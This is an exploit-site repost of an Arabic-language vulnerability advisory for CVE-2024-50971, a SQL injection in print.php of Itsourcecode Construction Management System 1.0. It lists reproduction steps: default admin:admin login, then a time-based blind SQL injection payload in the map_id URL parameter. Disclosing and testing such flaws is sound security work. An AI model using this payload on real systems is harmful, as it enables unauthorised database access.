Sploitus

Exploit for CVE-2024-50971

kitploit · 2026-08-25

Exploit Code

MARKDOWN28 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-AKHLAK2511-CVE-2024-50971
# CVE-2024-50971

## الوصف

تسمح ثغرة حقن SQL في ملف print.php الخاص بنظام إدارة الإنشاءات Itsourcecode الإصدار 1.0 للمهاجمين عن بُعد بتنفيذ أوامر SQL تعسفية عبر المعامل map_id.

## نوع الثغرة

حقن SQL

## البائع

Itsourcecode

## قاعدة الكود المتأثر:

https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ \- 1.0

## المكون المتأثر:

نظام إدارة الإنشاءات Itsourcecode v1.0 معرض لحقن SQL من خلال المعامل map_id في صفحة print.php.

## نواقل الهجوم:

  1. قم بإعداد التطبيق محليًا، وسجل حسابًا، ثم سجل الدخول باستخدام بيانات المشرف admin:admin
  2. انتقل إلى عنوان URL التالي في متصفحك: http://localhost/monitoring_system/print.php?map_id=67
  3. حقن حمولة SQL: قم بتعديل المعامل map_id في عنوان URL لإدراج حمولة حقن SQL زمنية. http://localhost/monitoring_system/print.php?map_id=67'+AND+(SELECT+1386+FROM+(SELECT(SLEEP(15)))LhJj)--+byxm